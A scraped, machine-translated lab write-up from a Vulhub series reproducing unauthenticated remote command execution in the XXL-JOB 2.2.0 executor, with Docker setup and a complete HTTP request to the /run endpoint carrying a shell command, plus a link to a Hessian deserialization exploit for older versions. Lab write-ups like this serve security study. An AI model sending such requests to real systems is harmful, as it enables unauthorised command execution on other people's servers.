当前位置:网站首页>Vulhub vulnerability recurrence 76_ XXL-JOB
Vulhub vulnerability recurrence 76_ XXL-JOB
2022-07-04 06:56:00 【Revenge_ scan】
XXL-JOB executor Unauthorized access vulnerability
Vulnerability Details
XXL-JOB Is a distributed task scheduling platform , Its core design goal is rapid development 、 Learn easy 、 Lightweight 、 Easy to expand . Now open source and access to a number of companies online product lines , Open the box .XXL-JOB It is divided into admin and executor Both ends , The former is the background management page , The latter is the client of task execution .executor Authentication is not configured by default , An unauthorized attacker can pass through RESTful API Execute arbitrary orders .
Reference link :
- https://mp.weixin.qq.com/s/jzXIVrEl0vbjZxI4xlUm-g
- https://landgrey.me/blog/18/
- https://github.com/OneSourceCat/XxlJob-Hessian-RCE
Environment building
shooting range :192.168.4.10_ubuntu
Execute the following command to start 2.2.0 Version of XXL-JOB:
#docker-compose up -d
After the environment starts , visit `http://your-ip:8080` You can view the management side (admin), visit `http://your-ip:9999` Can view the client (executor).
Loophole recurrence
Directly to the client (executor) Send the following packets , You can execute the command :
```
POST /run HTTP/1.1
Host: your-ip:9999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 365
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "touch /tmp/success",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
```
`touch /tmp/success` Has been successfully executed :
in addition , lower than 2.2.0 Version of XXL-JOB No, RESTful API, We can go through [Hessian Deserialization ](https://github.com/OneSourceCat/XxlJob-Hessian-RCE) To execute an order .
边栏推荐
- Common usage of time library
- Uniapp applet subcontracting
- Mobile adaptation: vw/vh
- the input device is not a TTY. If you are using mintty, try prefixing the command with ‘winpty‘
- Centos8 install mysql 7 unable to start up
- leetcode825. Age appropriate friends
- The final week, I split
- 期末周,我裂开
- How to input single quotation marks and double quotation marks in latex?
- The important role of host reinforcement concept in medical industry
猜你喜欢
Can the out of sequence message complete TCP three handshakes
A new understanding of how to encrypt industrial computers: host reinforcement application
uniapp小程序分包
[GF (q) + LDPC] regular LDPC coding and decoding design and MATLAB simulation based on the GF (q) field of binary graph
The final week, I split
uniapp 自定义环境变量
Fundamentals of SQL database operation
Common usage of time library
Uniapp applet subcontracting
uniapp 自定義環境變量
随机推荐
Cervical vertebra, beriberi
云Redis 有什么用? 云redis怎么用?
tars源码分析之5
在已經知道錶格列勾選一個顯示一列
Summary of June 2022
金盾视频播放器拦截的软件关键词和进程信息
Highly paid programmers & interview questions: how does redis of series 119 realize distributed locks?
Set JTAG fuc invalid to normal IO port
Download address of the official website of national economic industry classification gb/t 4754-2017
js 常用时间处理函数
Responsive mobile web test questions
Industrial computer anti-virus
Bottom problem of figure
Introduction to spark core components
Flink memory model, network buffer, memory tuning, troubleshooting
MySQL 45 lecture learning notes (VI) global lock
[problem record] 03 connect to MySQL database prompt: 1040 too many connections
ADC voltage calculation of STM32 single chip microcomputer
GoogleChromePortable 谷歌chrome浏览器便携版官网下载方式
The final week, I split